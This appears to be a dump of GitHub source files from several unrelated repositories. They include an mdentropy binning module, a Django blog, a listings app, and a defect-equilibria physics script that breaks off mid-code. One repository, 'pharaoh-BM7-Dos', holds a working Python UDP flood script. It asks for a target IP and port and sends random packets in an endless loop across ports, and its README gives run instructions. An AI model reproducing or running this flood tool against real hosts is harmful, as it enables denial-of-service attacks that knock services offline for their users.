optimal number of bins using Doane's Rule.\n\n Parameters\n ----------\n x : numpy.ndarray or list of floats\n Data to be binned.\n\n Returns\n -------\n n_bins : int\n \"\"\"\n if not isinstance(x, ndarray):\n x = array(x)\n\n n = x.shape[0]\n g1 = atleast_1d(skew(x))\n sg1 = sqrt(6 * (n - 2) / ((n + 1) * (n + 3)))\n\n return min(floor(1 + log2(n) + log2(1 + abs(g1)/sg1)))\n\n\ndef hist(n_bins, rng, *args):\n \"\"\"Convenience function for histogramming N-dimentional data\n\n Parameters\n ----------\n n_bins : int\n Number of bins.\n rng : list of lists\n List of min/max values to bin data over.\n args : array_like, shape = (n_samples, )\n Data of which to histogram.\n\n Returns\n -------\n bins : array_like, shape = (n_bins, )\n \"\"\"\n data = vstack((args)).T\n\n if n_bins is None:\n n_bins = doanes_rule(data)\n\n return histogramdd(data, bins=n_bins, range=rng)[0].flatten()\n\n\ndef symbolic(n_bins, rng, *args):\n \"\"\"Symbolic binning of data\n\n Parameters\n ----------\n rng : list of lists\n List of min/max values for each dimention.\n n_bins : int\n Number of bins to use.\n args : array_like, shape = (n_samples, )\n Data of which to calculate entropy. 
Each array must have the same\n number of samples.\n\n Returns\n -------\n counts : float\n \"\"\"\n labels = empty(0).reshape(args[0].shape[0], 0)\n if n_bins is None:\n n_bins = min(map(doanes_rule, args))\n\n for i, arg in enumerate(args):\n\n partitions = linspace(rng[i][0], rng[i][1], n_bins + 1)\n label = digitize(arg, partitions).reshape(-1, 1)\n\n labels = hstack((labels, label))\n\n return unique_row_count(labels)\n" }, { "alpha_fraction": 0.5489022135734558, "alphanum_fraction": 0.552495002746582, "avg_line_length": 41.45762634277344, "blob_id": "1b5d5735b08f7cbc0cff8fb1c2828886237fec11", "content_id": "6ed2881561ff14a6583037dd147b0b55eac2d4c6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2505, "license_type": "permissive", "max_line_length": 82, "num_lines": 59, "path": "/mdentropy/cli/dmutinf.py", "repo_name": "shozebhaider/mdentropy", "src_encoding": "UTF-8", "text": "# !/usr/bin/env python\n\nfrom argparse import ArgumentDefaultsHelpFormatter\n\n\ndef func(args, parser):\n # delay import of the rest of the module to improve `mdentropy -h` performance\n import pickle\n import mdtraj as md\n import pandas as pd\n from ..utils import parse_files\n from ..metrics import DihedralMutualInformation\n\n files = parse_files(args.traj)\n traj = md.load(files, top=args.top, stride=args.stride)\n\n mi = DihedralMutualInformation(n_bins=args.nbins, types=args.types,\n method=args.method, threads=args.n_threads,\n normed=True)\n\n M = mi.partial_transform(traj, shuffle=iter, verbose=True)\n\n df = pd.DataFrame(M, columns=mi.labels)\n\n pickle.dump(df, open(args.out, 'wb'))\n\n\ndef configure_parser(sub_parsers):\n help = 'Run a dihedral mutual information calculation'\n p = sub_parsers.add_parser('dmutinf', description=help, help=help,\n formatter_class=ArgumentDefaultsHelpFormatter)\n p.add_argument('-i', '--input', dest='traj',\n help='File containing trajectory.', required=True)\n 
p.add_argument('-s', '--shuffle-iter', dest='iter',\n help='Number of shuffle iterations.',\n default=100, type=int)\n p.add_argument('-t', '--topology', dest='top',\n help='File containing topology.', default=None)\n p.add_argument('-b', '--n-bins', dest='nbins',\n help='Number of bins', default=3, type=int)\n p.add_argument('-n', '--n-threads', dest='n_threads',\n help='Number of threads to be used.',\n default=None, type=int)\n p.add_argument('-r', '--stride', dest='stride',\n help='Stride to use', default=1, type=int)\n p.add_argument('-o', '--output', dest='out',\n help='Name of output file.', default='mutinf.pkl')\n p.add_argument('-m', '--method', dest='method',\n help='Entropy estimate method.',\n choices=['chaowangjost', 'grassberger', 'kde',\n 'knn', 'naive'],\n default='knn')\n p.add_argument('-d', '--dihedrals', dest='dihedrals',\n help='Dihedral angles to analyze.',\n nargs='+',\n choices=['phi', 'psi', 'omega', 'chi1',\n 'chi2', 'chi3', 'chi4'],\n default=['phi', 'psi'])\n p.set_defaults(func=func)\n" } ]
26
pharaoh1bm7/pharaoh-BM7-Dos
https://github.com/pharaoh1bm7/pharaoh-BM7-Dos
9c0abd9e21849689d0939c1f75166b66596394af
5e388197e2bc2b426b63b6551543249a6f2c813b
2c85ef99020116d7c18cf141adf7d0438c145274
refs/heads/main
2023-05-07T04:21:28.464238
2021-05-26T19:25:44
2021-05-26T19:25:44
371,064,182
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5893271565437317, "alphanum_fraction": 0.6380510330200195, "avg_line_length": 20.524999618530273, "blob_id": "01117c801d914f5907769ec9f322746389ebfc51", "content_id": "0202c48f79e2b8b6e664314b95131afca6b27725", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 862, "license_type": "no_license", "max_line_length": 63, "num_lines": 40, "path": "/pharaoh BM7 Dos.py", "repo_name": "pharaoh1bm7/pharaoh-BM7-Dos", "src_encoding": "UTF-8", "text": "import sys\nimport os\nimport time\nimport socket\nimport random\n#Code Time\nfrom datetime import datetime\nnow = datetime.now()\nhour = now.hour\nminute = now.minute\nday = now.day\nmonth = now.month\nyear = now.year\n\n##############\nsock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\nbytes = random._urandom(1490)\n#############\n\nos.system(\"clear\")\nos.system(\"figlet pharaoh BM7 Dos\")\nprint \"\"\nprint \"\t\tby pharaoh BM7 & S0DIUM TA8\"\nprint \"\t\ttelegram : +1 510 216 7579\"\nprint \"\t\tgithub : pharaoh1bm7\"\nprint \"\t\twhatsapp : +994 40 778 12 25\"\nprint\nip = raw_input(\"\tIP Target : \")\nport = input(\"\t\tPort : \")\n\nos.system(\"clear\")\nos.system(\"figlet Attack Starting\")\nsent = 0\nwhile True:\n sock.sendto(bytes, (ip,port))\n sent = sent + 1\n port = port + 1\n print \"Sent %s packet to %s DOS to port:%s\"%(sent,ip,port)\n if port == 65534:\n port = 1\n\n" }, { "alpha_fraction": 0.7551867365837097, "alphanum_fraction": 0.7634854912757874, "avg_line_length": 31, "blob_id": "d9fb75e00d2b3daf7ba784825858c9d869fa6420", "content_id": "c95a5512db7f2399bdf60173bc4155effda2a267", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 482, "license_type": "no_license", "max_line_length": 125, "num_lines": 15, "path": "/README.md", "repo_name": "pharaoh1bm7/pharaoh-BM7-Dos", "src_encoding": "UTF-8", "text": "# pharaoh-BM7-Dos\n\n\n\n# DDos-Attack \n### What Is A 
DDos-Attack\n### A Distributed Denial of Service (DDoS) attack is an attempt to make an online service unavailable \nby overwhelming it with traffic from multiple sources. They target a wide variety of important resources\nfrom banks to news websites, and present a major challenge to making sure people can publish and access important information\n\n### cd pharaoh BM7 Dos\n\n### chmod +x pharaoh BM7 Dos\n\n###python pharaoh BM7 Dos.py\n\n\n" } ]
2
cuongtranba/django-python-blog
https://github.com/cuongtranba/django-python-blog
7d481ed2621422cfdae2cfcbc9c74300a2fd74cd
33d2e8404e411e26ca8407ae1299fdfdc128eddc
dc7b885f24ea3a10f0f00d8e0f46cb0d8691ac34
refs/heads/master
2021-01-17T18:07:13.450092
2016-11-05T07:54:30
2016-11-05T07:54:30
71,055,321
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5644444227218628, "alphanum_fraction": 0.5940740704536438, "avg_line_length": 24.961538314819336, "blob_id": "a0a5ae22dca9f07eec680ad226fd493ecc06c45a", "content_id": "677e47be1950902a4163d1af484667ede85f34ed", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 675, "license_type": "no_license", "max_line_length": 103, "num_lines": 26, "path": "/myblog/migrations/0005_auto_20161102_0917.py", "repo_name": "cuongtranba/django-python-blog", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.7 on 2016-11-02 02:17\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('myblog', '0004_post_category'),\n ]\n\n operations = [\n migrations.RenameField(\n model_name='category',\n old_name='name',\n new_name='category_name',\n ),\n migrations.AlterField(\n model_name='post',\n name='category',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='myblog.Category'),\n ),\n ]\n" }, { "alpha_fraction": 0.695602536201477, "alphanum_fraction": 0.6978869438171387, "avg_line_length": 32.55769348144531, "blob_id": "aa9b2f886a8b744fb36dfa6f733cce253fe60dce", "content_id": "513a4f2f4885411ad0e2a5b7c83e1a3d7a43d788", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1751, "license_type": "no_license", "max_line_length": 97, "num_lines": 52, "path": "/myblog/views.py", "repo_name": "cuongtranba/django-python-blog", "src_encoding": "UTF-8", "text": "from django.shortcuts import render\nfrom django.http import HttpResponse\nfrom django.template import loader\nfrom .models import Category,Tag,Post\nfrom django.contrib.auth import authenticate, login,logout\nfrom django.core.urlresolvers import reverse\nfrom django.http import HttpResponseRedirect\nfrom 
django.contrib.auth.models import User\nimport datetime\n\ndef index(request):\n categories = Category.objects.all()\n posts= Post.objects.all()\n tags=Tag.objects.all()\n return render(request, \"index.html\", {'categories': categories,'tags':tags,'posts':posts})\n\ndef UserLogin(request):\n username = request.POST['username']\n password = request.POST['password']\n user = authenticate(username=username, password=password)\n if user is not None:\n login(request, user)\n url=reverse(\"index\")\n return HttpResponseRedirect(url)\n else:\n return HttpResponse('<h1>Error</h1>') \n \ndef UserLogout(request):\n logout(request)\n url=reverse(\"index\")\n return HttpResponseRedirect(url)\n\ndef UserRegister(request):\n username=request.POST['username']\n password=request.POST['password']\n email=request.POST['email']\n user = User.objects.create_user(username, email, password)\n if user is not None:\n url=reverse(\"index\")\n return HttpResponseRedirect(url)\n return HttpResponse('<h1>Error</h1>')\n\ndef CreatePost(request):\n if request.method == 'GET':\n return render(request,\"post.html\") \n else:\n title=request.POST['title']\n content=request.POST['content']\n post=Post(title=title,content=content,user=request.user,pub_date=datetime.datetime.now())\n post.save()\n url=reverse(\"index\")\n return HttpResponseRedirect(url)\n \n\n" }, { "alpha_fraction": 0.7727272510528564, "alphanum_fraction": 0.7727272510528564, "avg_line_length": 21, "blob_id": "504c14f4b5a1ecab268561e05de70b200d7811db", "content_id": "73fb3359ff78da5c7d794aa43999c493a6a53fee", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 44, "license_type": "no_license", "max_line_length": 22, "num_lines": 2, "path": "/README.md", "repo_name": "cuongtranba/django-python-blog", "src_encoding": "UTF-8", "text": "# django-python-blog\nMy blog made by django\n" }, { "alpha_fraction": 0.7022472023963928, "alphanum_fraction": 0.7134831547737122, 
"avg_line_length": 21.967741012573242, "blob_id": "75fae6d4c966ca780ab13829a017631aaa184925", "content_id": "d83e60b70a2007a61105f139183e3ea3388b9502", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 712, "license_type": "no_license", "max_line_length": 52, "num_lines": 31, "path": "/myblog/models.py", "repo_name": "cuongtranba/django-python-blog", "src_encoding": "UTF-8", "text": "from django.db import models\nfrom django.contrib.auth.models import User\n\n# Create your models here.\n\n\nclass BaseModel(models.Model):\n is_deleted = models.BooleanField(default=False)\n id = models.AutoField(primary_key=True)\n\n class Meta:\n abstract = True\n\nclass Tag(BaseModel):\n tag_name = models.CharField(max_length=20)\n\n\nclass Category(BaseModel):\n category_name = models.CharField(max_length=200)\n\n\nclass Post(BaseModel):\n title = models.CharField(max_length=200)\n content = models.TextField()\n \n pub_date = models.DateTimeField()\n user = models.ForeignKey(User,null=True)\n\n tag = models.ForeignKey(Tag,null=True)\n\n category = models.ForeignKey(Category,null=True)\n" }, { "alpha_fraction": 0.6842105388641357, "alphanum_fraction": 0.6842105388641357, "avg_line_length": 39.11111068725586, "blob_id": "fe122dc407822f88f776bb046bfda858e303f9a9", "content_id": "d9810a94fd35fa44e8f42ed111cf01b59f9bdabe", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 361, "license_type": "no_license", "max_line_length": 67, "num_lines": 9, "path": "/myblog/urls.py", "repo_name": "cuongtranba/django-python-blog", "src_encoding": "UTF-8", "text": "from django.conf.urls import url\nfrom . 
import views\nurlpatterns = [\n url(r'^$', views.index, name='index'),\n url(r'^login/$',views.UserLogin,name='UserLogin'),\n url(r'^userlogout/$',views.UserLogout,name='UserLogout'),\n url(r'^userregister/$',views.UserRegister,name='UserRegister'),\n url(r'^createpost/$',views.CreatePost,name='CreatePost'),\n]\n" }, { "alpha_fraction": 0.4927752912044525, "alphanum_fraction": 0.5057299733161926, "avg_line_length": 30.85714340209961, "blob_id": "a082414361e9c4fb95be45420029a23296aa9864", "content_id": "9194f5bfa76db3ceb5026171169ce26797d4cc40", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2007, "license_type": "no_license", "max_line_length": 99, "num_lines": 63, "path": "/myblog/migrations/0001_initial.py", "repo_name": "cuongtranba/django-python-blog", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.9.7 on 2016-10-16 14:18\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Post',\n fields=[\n ('is_deleted', models.BooleanField(default=False)),\n ('id', models.AutoField(primary_key=True, serialize=False)),\n ('title', models.CharField(max_length=200)),\n ('content', models.TextField()),\n ('pub_date', models.DateTimeField()),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='Tag',\n fields=[\n ('is_deleted', models.BooleanField(default=False)),\n ('id', models.AutoField(primary_key=True, serialize=False)),\n ('tag_name', models.CharField(max_length=20)),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.CreateModel(\n name='User',\n fields=[\n ('is_deleted', models.BooleanField(default=False)),\n ('id', models.AutoField(primary_key=True, serialize=False)),\n ('name', models.CharField(max_length=20)),\n ('picture_url', 
models.CharField(max_length=200)),\n ],\n options={\n 'abstract': False,\n },\n ),\n migrations.AddField(\n model_name='post',\n name='tag',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='myblog.Tag'),\n ),\n migrations.AddField(\n model_name='post',\n name='user',\n field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='myblog.User'),\n ),\n ]\n" } ]
6
cmr5289/ibnlist
https://github.com/cmr5289/ibnlist
93a94ab247454a3a87ebbb888bf00327fbc7f6fa
a7a3a7f5ea36323960673f4553d03a714317fbb1
cc5449d6558371802aaedddbaf5a50d256ce48f7
refs/heads/dev
2018-10-13T04:35:40.184394
2018-07-11T17:18:23
2018-07-11T17:18:23
127,462,065
0
0
null
2018-03-30T18:48:43
2018-03-30T19:07:05
2018-03-30T19:07:35
CSS
[ { "alpha_fraction": 0.7274401187896729, "alphanum_fraction": 0.7292817831039429, "avg_line_length": 19.11111068725586, "blob_id": "b8cca4bfa8c670177c1c356bd360392b4f702e4f", "content_id": "b159692835a35c01ec1ab23f4da49306ce5c7875", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 543, "license_type": "no_license", "max_line_length": 56, "num_lines": 27, "path": "/ibnList/admin.py", "repo_name": "cmr5289/ibnlist", "src_encoding": "UTF-8", "text": "\"\"\"\nAdmin panel configuration\n\"\"\"\nfrom django.contrib import admin\n\n# from bucksac.core.main.admin import GroupAdmin\n\nfrom ibnList import models\n\n\nclass CommentInLine(admin.TabularInline):\n model = models.Comments\n extra = 0\n\n\nclass ListingAdmin(admin.ModelAdmin):\n search_fields = ('listing_name',)\n list_filter = ('active',)\n inlines = [\n CommentInLine,\n ]\n\n\nadmin.site.register(models.ListingEntry, ListingAdmin)\n\n# admin.site.register(models.DirectoryGroup, GroupAdmin)\n# admin.site.register(models.DirectoryRole)\n" }, { "alpha_fraction": 0.566293478012085, "alphanum_fraction": 0.5869181156158447, "avg_line_length": 38.46511459350586, "blob_id": "e736ca340533b6adeccfcbc66d7d3e72832175e5", "content_id": "ee947ec0b43866df31668f46f1654cbb4693277e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1697, "license_type": "no_license", "max_line_length": 145, "num_lines": 43, "path": "/ibnList/migrations/0001_initial.py", "repo_name": "cmr5289/ibnlist", "src_encoding": "UTF-8", "text": "# -*- coding: utf-8 -*-\n# Generated by Django 1.11.2 on 2018-05-01 18:41\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n initial = True\n\n dependencies = [\n ]\n\n operations = [\n migrations.CreateModel(\n name='Comments',\n fields=[\n ('id', models.AutoField(auto_created=True, 
primary_key=True, serialize=False, verbose_name='ID')),\n ('comment', models.CharField(blank=True, max_length=500, null=True, verbose_name=b'Comment')),\n ],\n ),\n migrations.CreateModel(\n name='ListingEntry',\n fields=[\n ('listing_id', models.AutoField(primary_key=True, serialize=False)),\n ('listing_name', models.CharField(max_length=500, verbose_name=b'Listing Name')),\n ('listing_description', models.TextField(blank=True, null=True)),\n ('listing_email', models.CharField(max_length=255)),\n ('listing_location_street_address', models.CharField(max_length=100)),\n ('listing_location_city', models.CharField(max_length=30)),\n ('listing_location_state', models.CharField(max_length=20)),\n ('listing_location_zip', models.CharField(max_length=12)),\n ('active', models.BooleanField()),\n ],\n ),\n migrations.AddField(\n model_name='comments',\n name='person',\n field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='comments', to='ibnList.ListingEntry'),\n ),\n ]\n" }, { "alpha_fraction": 0.5534206628799438, "alphanum_fraction": 0.5619875192642212, "avg_line_length": 25.022293090820312, "blob_id": "e46b89f9af42c4e0bf5e7b2b907befe36f60dd02", "content_id": "73b194969227e89fee866a000b8c44deb0831379", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8171, "license_type": "no_license", "max_line_length": 66, "num_lines": 314, "path": "/ibnList/models.py", "repo_name": "cmr5289/ibnlist", "src_encoding": "UTF-8", "text": "\"\"\"\nData models for ibnlist\n\"\"\"\nfrom django.db import models\nfrom django.contrib.auth.models import User\n\n# from bucksac.core.main.models import Group, Role\n# from bucksac.back_office.world.models import Building, Room\n\n\n# class DirectoryRole(Role):\n# \"\"\"\n# A group role\n# \"\"\"\n# pass\n\n\n# class DirectoryGroup(Group):\n# \"\"\"\n# Group model\n# \"\"\"\n# pass\n\n# Listing Types\nListing_types = (\n ('status_code', 
'display_name'),\n)\n\n\n# Listing Entries\nclass ListingEntry(models.Model):\n # Primary Key\n listing_id = models.AutoField(\n primary_key=True)\n # Listing Name\n listing_name = models.CharField(\n max_length=500,\n blank=False,\n verbose_name='Listing Name',\n null=False)\n # Listing Description\n listing_description = models.TextField(\n blank=True,\n null=True)\n # Listing Details not sure what to do for this yet\n # Listing Contact Info\n listing_email = models.CharField(\n max_length=255,\n blank=False,\n null=False)\n # Listing Location\n # Listing Location Address\n listing_location_street_address = models.CharField(\n max_length=100,\n blank=False,\n null=False)\n # Listing Location City\n listing_location_city = models.CharField(\n max_length=30,\n blank=False,\n null=False)\n # Listing Location State\n listing_location_state = models.CharField(\n max_length=20,\n blank=False,\n null=False)\n # Listing Location Zip\n listing_location_zip = models.CharField(\n max_length=12,\n blank=False,\n null=False)\n # Is Active\n active = models.BooleanField()\n\n\nclass Comments(models.Model):\n # Comment\n comment = models.CharField(\n max_length=500,\n verbose_name=\"Comment\",\n blank=True,\n null=True)\n # Many Comments to One Listing\n person = models.ForeignKey(\n ListingEntry,\n related_name='comments',\n null=True,\n on_delete=models.SET_NULL)\n\n def __str__(self):\n return \"%s\" % (self.pk)\n\n def __unicode__(self):\n return \"%s\" % (self.pk)\n\n\n\n# # New Directory Models\n# class BuildingEntry(models.Model):\n# # Building ID, Primary Key\n# building_id = models.AutoField(\n# primary_key=True)\n# # Building Name\n# building_name = models.CharField(\n# max_length=255,\n# blank=False,\n# verbose_name=\"Building Name\",\n# null=False)\n# # Campus location\n# campus = models.CharField(\n# max_length=255,\n# blank=False,\n# null=False)\n# # Is Active\n# active = models.BooleanField()\n\n# def __str__(self):\n# return \"%s\" % (self.building_name)\n\n# 
def __unicode__(self):\n# return \"%s\" % (self.building_name)\n\n# class Meta:\n# ordering = ['building_name']\n\n\n# class DepartmentEntry(models.Model):\n# # Department ID, Primary Key\n# department_id = models.AutoField(\n# primary_key=True)\n# # Department Name\n# department_name = models.CharField(\n# max_length=255,\n# verbose_name=\"Department Name\",\n# blank=False,\n# null=False)\n# # Is Active\n# active = models.BooleanField()\n\n# def __str__(self):\n# return \"%s\" % (self.department_name)\n\n# def __unicode__(self):\n# return \"%s\" % (self.department_name)\n\n# class Meta:\n# ordering = ['department_name']\n\n\n# class PersonEntry(models.Model):\n# # Name\n# name = models.CharField(\n# max_length=255,\n# blank=False,\n# null=False)\n# # Title Ex: Dr.\n# title = models.CharField(\n# max_length=255,\n# blank=True,\n# null=True,\n# help_text=\"Title should be \\\"Dr.\\\" or left blank\")\n# # Suffix Ex: MFA, MBA, PHD\n# suffix = models.CharField(\n# max_length=255,\n# blank=True,\n# null=True)\n# # Office Room Number\n# room_number = models.CharField(\n# max_length=50,\n# verbose_name=\"Room Number\",\n# blank=True,\n# null=True)\n# # Email\n# email = models.CharField(\n# max_length=255,\n# blank=False,\n# null=False)\n# # Uname, used to associate user for editing own profile\n# uname = models.CharField(\n# max_length=255,\n# blank=False,\n# null=False)\n# # Person's Position\n# position = models.CharField(\n# max_length=255,\n# blank=False,\n# null=False)\n# # Person's Degrees\n# degree = models.CharField(\n# max_length=255,\n# blank=True,\n# null=True)\n# # Bio\n# bio = models.TextField(\n# blank=True,\n# null=True)\n# # Person Status Code Ex: AA or PRES\n# status_code = models.CharField(\n# max_length=100,\n# verbose_name=\"Status Code\",\n# choices=PERSON_STATUS_CHOICES,\n# default=\"Default\",\n# null=True,\n# blank=True)\n# # Building Foreign Key\n# building = models.ForeignKey(\n# BuildingEntry,\n# null=True,\n# on_delete=models.SET_NULL,\n# 
limit_choices_to={'active': True})\n# # Department Foreign Key\n# department = models.ManyToManyField(\n# DepartmentEntry,\n# limit_choices_to={'active': True},\n# help_text=\"To select multiple Departments use ctrl + \" +\n# \"click (cmd + click on mac)\")\n# # Is Active\n# active = models.BooleanField()\n\n# def get_first_name(self):\n# return self.name.split(\" \")[0]\n\n# def get_last_name(self):\n# temp = self.name.split(\" \")\n# return temp[len(temp) - 1]\n\n\n# class OfficeEntry(models.Model):\n# # Office ID, Primary Key\n# office_id = models.AutoField(\n# primary_key=True)\n# # Office name\n# office_name = models.CharField(\n# max_length=255,\n# verbose_name=\"Office Name\",\n# blank=False,\n# null=False)\n# # Room Number for the Office\n# office_room_number = models.CharField(\n# max_length=10,\n# verbose_name=\"Office Room Number\",\n# blank=False,\n# null=False)\n# # Office Email\n# office_email = models.CharField(\n# max_length=255,\n# verbose_name=\"Office Email\",\n# blank=True,\n# null=True)\n# # Office Status Code Ex: FAX or LAB\n# status_code = models.CharField(\n# max_length=100,\n# verbose_name=\"Office Status Code\",\n# choices=OFFICE_STATUS_CHOICES,\n# default=\"Default\",\n# null=True,\n# blank=True)\n# # Building Foreign Key\n# building = models.ForeignKey(\n# BuildingEntry,\n# null=True,\n# on_delete=models.SET_NULL,\n# limit_choices_to={'active': True})\n# # Department Foreign Key\n# department = models.ManyToManyField(\n# DepartmentEntry,\n# limit_choices_to={'active': True})\n# # Is part of the Frequent Contacted list\n# frequent = models.BooleanField(\n# verbose_name=\"Frequently Contacted Office\")\n# # Is Active\n# active = models.BooleanField()\n\n\n# class PhoneNumber(models.Model):\n# # Phone Number\n# phone_number = models.CharField(\n# max_length=50,\n# verbose_name=\"Phone Number\",\n# blank=True,\n# null=True)\n# # Many Phones to One Person\n# person = models.ForeignKey(\n# PersonEntry,\n# related_name='phone_numbers',\n# 
null=True,\n# on_delete=models.SET_NULL)\n\n# def __str__(self):\n# return \"%s\" % (self.pk)\n\n# def __unicode__(self):\n# return \"%s\" % (self.pk)\n\n\n# class OfficePhoneNumber(models.Model):\n# # Phone Number\n# phone_number = models.CharField(\n# max_length=50,\n# verbose_name=\"Phone Number\",\n# blank=True,\n# null=True)\n# # Many Phones to One Office\n# office = models.ForeignKey(\n# OfficeEntry,\n# related_name='office_phone_numbers',\n# null=True,\n# on_delete=models.SET_NULL)\n\n# def __str__(self):\n# return \"%s\" % (self.pk)\n\n# def __unicode__(self):\n# return \"%s\" % (self.pk)\n" }, { "alpha_fraction": 0.4399999976158142, "alphanum_fraction": 0.6933333277702332, "avg_line_length": 14, "blob_id": "1be2d83c8b2308a3d5080d7e5da676ea60ac2d65", "content_id": "15a84334e3c1f9d68d4e31bafe0d4fb8f04b77c7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 75, "license_type": "no_license", "max_line_length": 18, "num_lines": 5, "path": "/requirements.txt", "repo_name": "cmr5289/ibnlist", "src_encoding": "UTF-8", "text": "Django==1.11.2\nolefile==0.44\nPillow==4.1.1\npytz==2017.2\nvirtualenv==15.1.0\n" } ]
4
vrindaasomjit/Defect-equilibria
https://github.com/vrindaasomjit/Defect-equilibria
b60e800045a21ad73954536649cab4b80b554c1a
628bb6f493c6dbd0b4f95ecf104b769cc3ed2ca2
163da9e5c929906473346b0657fc6921692070ef
refs/heads/main
2023-08-15T00:38:02.381583
2021-10-10T03:42:01
2021-10-10T03:42:01
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7780082821846008, "alphanum_fraction": 0.8008298873901367, "avg_line_length": 191.8000030517578, "blob_id": "01462bc2014abc17f9851d35819efdd33158f9b0", "content_id": "e8baa8663c11febb34d1ba1fe8efdcd0fd8bb367", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 1929, "license_type": "no_license", "max_line_length": 763, "num_lines": 10, "path": "/README.md", "repo_name": "vrindaasomjit/Defect-equilibria", "src_encoding": "UTF-8", "text": "# Defect-equilibria\nThis repository contains the Python code and example input files to calculate defect equilibria in ionic crystals (also known as Kroger-Vink or Brouwer diagrams). <br/>\n<br/>\nThis code was used to calculate the defect equilibria in undoped Al2O3 across a range of oxygen gas partial pressures at 1100 K and in undoped Al2O3 across a range of hydrogen gas partial pressures at 300 K. For the latter case, the concentrations of native defects in Al2O3 are kept fixed at the values obtained at 1100 K, high pO2 conditions. This is to reflect 'frozen in' defects from Al2O3 growth and subsequent hydrogen complex formation during cooldown. The low temperature (300 K) and high migration barriers for native defects in Al2O3 prevents them from re-equilibrating with the environment, causing them to be kinetically trapped. However, hydrogen is mobile enough to equilibrate with the environment and form complexes with the native defects. <br/>\n<br/>\nOur paper (Somjit, Vrindaa, and Bilge Yildiz. \"Doping α-Al2O3 to reduce its hydrogen permeability: Thermodynamic assessment of hydrogen defects and solubility from first principles.\" Acta Materialia 169 (2019): 172-183) and its supplementary information has details on the method, derivation of the different concentration terms, and interpretation of the results, etc.<br/>\n<br/>\nI wrote this code early on during my PhD when I was still learning the ropes, so it is not the most modularized. 
I hope to clean it up sometime, however, it is still easy to understand and use, and can be extended to other materials and other cases as well (such as doped systems).<br/>\n<br/>\nThis code self-consistently calculates the Fermi level at a given pO2 or pH2 at which charge neutrality is obtained. The electronic and ionic defect concentrations are calculated using this equilibrium Fermi level at a given pO2. Doing this over a range of pO2 gives us the Kroger-Vink diagram.\n" }, { "alpha_fraction": 0.5629838705062866, "alphanum_fraction": 0.6112903356552124, "avg_line_length": 43.28571319580078, "blob_id": "7859b194e092d8fdc2487d916668488c828b68f9", "content_id": "29455a95bdfcc5fa789e185c46e77f4aa1374d4a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12400, "license_type": "no_license", "max_line_length": 129, "num_lines": 280, "path": "/native defect equilibria/KVD_native_defect_equilibria.py", "repo_name": "vrindaasomjit/Defect-equilibria", "src_encoding": "UTF-8", "text": "\"\"\"\nThis program constructs the Kroger-Vink plot for Al2O3 at a given temperature.\n\nThe charge neutrality equation has the following terms: sum of (charge of defect*concentration of defect),\nconcentration of valence band holes and concentration of conduction band electrons.\n\nEach term is a non-linear function of the Fermi level Ef, which ranges from 0 to Eg (bandgap).\nThe electronic defect concentrations are calculated using the Fermi-Dirac distribution and \nintegrating over the density of states suing the trapezoidal method.\n\nThus, the bisection method is used to solve for Ef that achieves charge neutrality at each pO2. 
\n\nFrom Ef, we can calculate the equilibrium defect concentration at a given pO2.\nPerforming this over a range of pO2 gives us the Kroger-Vink diagram.\n\"\"\"\nimport numpy as np\nimport math as m\nimport matplotlib.pyplot as plt\nimport pylab\n\"\"\"\n*****************TO FIND CONCENTRATION OF ELECTRONIC DEFECTS*******************\n\"\"\"\n\"\"\"\nTo find VBM and CBM row numbers\n\"\"\"\n# finds the VBM and returns its row number\ndef find_VBM(rows_DOS, E_VBM): \n for i in range(0, rows_DOS): \n if DOS[i,0] == E_VBM: #first column of DOS has the energy\n VBM_line = i\n return VBM_line\n# finds the CBM and returns its row number\ndef find_CBM(rows_DOS, E_CBM): \n for i in range(0, rows_DOS): \n if DOS[i,0] == E_CBM: #first column of DOS has the energy\n CBM_line = i\n return CBM_line\n\n\"\"\"\nTrapezoidal method to find concentration of electronic defects by using the Fermi-Dirac distribution\nand integrating over density of states\nEf is calculated assuming E_VBM is the reference level, therefore E_VBM term included in the F-D distribution\n\"\"\"\n# returns the concentration of valence band holes when Fermi level=Ef\ndef trapz_holes(VBM_line, DOS, Ef, E_VBM): \n conc_holes = 0\n func = np.empty((VBM_line+1, 1), dtype=float) \n for i in range(0, VBM_line+1): \n func[i] = 